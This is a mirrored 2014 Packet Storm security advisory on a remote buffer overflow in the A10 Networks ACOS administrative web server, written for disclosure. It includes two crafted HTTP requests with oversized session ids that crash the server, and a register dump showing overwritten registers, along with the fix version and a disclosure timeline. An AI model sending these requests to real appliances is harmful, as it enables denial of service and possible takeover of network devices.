Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormFrancisco PernaPACKETSTORM:125979
HistoryApr 02, 2014 - 12:00 a.m.

A10 Networks ACOS 2.7.0-P2 Buffer Overflow

2014-04-0200:00:00
Francisco Perna
packetstormsecurity.com
20
JSON
`  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
=== Details ===  
  
Advisory:  
http://www.quantumleap.it/a10-networks-remote-buffer-overflow-softax/  
Affected Product: ACOS  
Version: 2.7.0-P2(build: 53) (older versions may be affected too)  
(Tested on SoftAX[2])  
  
=== Executive Summary ===  
  
Using a specially crafted HTTP request to the administration web server,  
it is possible to exploit a lack in the user input validation.  
Successful exploitation of the vulnerability may result in remote code  
execution. Unsuccessful exploitation of the vulnerability may result in  
a Denial of Service of the administrative interface.  
  
=== Proof of Concept ===  
  
Submitting arbitrary input in the HTTP request it?s possible to cause a  
buffer overflow. If you provide an overly long ?session id? in the  
request, the web server crashes. To reproduce the crash you can send one  
of the following requests to the web server:  
  
<HTTPREQ1>  
GET  
/US/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/sys_reboot.html  
HTTP/1.1  
Host: 192.168.1.210  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101  
Firefox/20.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
</HTTPREQ1>  
  
<HTTPREQ2>  
GET  
/US/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/sys_reboot.html  
HTTP/1.1  
Host: 192.168.1.210  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101  
Firefox/20.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
<HTTPREQ2>  
  
Once the crash occurs the following is the registers state of the SoftAX  
appliance:  
  
<REGSTATE>  
rax 0×0 0  
rbx 0x1e30300 31654656  
rcx 0×6 6  
rdx 0xffffffff 4294967295  
rsi 0xcac18f12 3401682706  
rdi 0×4141414141414141 4702111234474983745  
rbp 0×4141414141414141 0×4141414141414141  
rsp 0x7fffbdf9b400 0x7fffbdf9b400  
r8 0×2000 8192  
r9 0×20 32  
r10 0×0 0  
r11 0x7f10b4cec180 139709729653120  
r12 0×0 0  
r13 0x1e30318 31654680  
r14 0x1e30300 31654656  
r15 0x1e33b58 31669080  
rip 0×524149 0×524149  
eflags 0×10246 [ PF ZF IF RF ]  
cs 0×33 51  
ss 0x2b 43  
ds 0×0 0  
es 0×0 0  
fs 0×0 0  
gs 0×0 0  
fctrl 0x37f 895  
fstat 0×0 0  
ftag 0xffff 65535  
fiseg 0×0 0  
fioff 0×0 0  
foseg 0×0 0  
fooff 0×0 0  
fop 0×0 0  
mxcsr 0x1f80 [ IM DM ZM OM UM PM ]  
</REGSTATE>  
  
=== Solution ===  
  
To fix the A10 Networks remote Buffer Overflow you have to upgrade at  
least to version 2.7.0-p6  
  
=== Disclosure Timeline ===  
  
2013-05-11 ? A10 Networks remote Buffer Overflow discovered  
2013-05-28 ? Initial vendor notification  
2013-05-30 ? The vendor acknowledge the vulnerability (bug 128069 )  
2014-03-28 ? The vendor fixed the vulnerability[3]  
2014-04-02 ? Public advisory  
  
=== Discovered by ===  
  
Vulnerability discovered by Francesco Perna of Quantum Leap s.r.l  
  
=== References ===  
  
[1] http://www.a10networks.com/about/technology_platform_acos.php  
[2] http://www.a10networks.com/glossary/SoftAX.php  
[3]  
https://www.a10networks.com/support-axseries/downloads/AX_Series_270-P6_RelNotes_20140328.pdf  
  
- --   
Francesco Perna  
Quantum Leap SRL  
Sede Legale: Via Colle Scorrano n.5 65100 Pescara (PE)  
Sede Operativa: Circonvallazione Cornelia n. 125, 00165 Roma (RM)  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v2.0.17 (MingW32)  
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/  
  
iQEcBAEBAgAGBQJTO7mWAAoJEPBLO12s/SuDKi8H/A+X4zIfkcwID4zTtbx7unnD  
m48/DAVNQpVLBEAWYnu7a4I98FO4gtbHn2OkQOF5beweK6uDLQMbxrzbkufgisik  
o10n8xbsa72GsPwadNxpMEtbLozmcjH5lyXPasfQ3OZkaxptesJJbTOGGoDx5M7t  
Py0X+iBkoqqCZO5wlvWsFg2cwgjw5hexXsj4qPTEPrsILvU1bhRO46Ky7Zf1roZ+  
jtSK9WyMAtiEnpW9N/srjl71vmu9T8Bkpg8iaffq6De7DKbB0aF8x6Jx9EwAkbI5  
M8dBDIve6mbwjlWIBmvMBQxiVuXUSUNf0G6gwq++i0bPn/11m1C1XkODsJXJHhk=  
=9BkH  
-----END PGP SIGNATURE-----  
  
  
  
`
JSON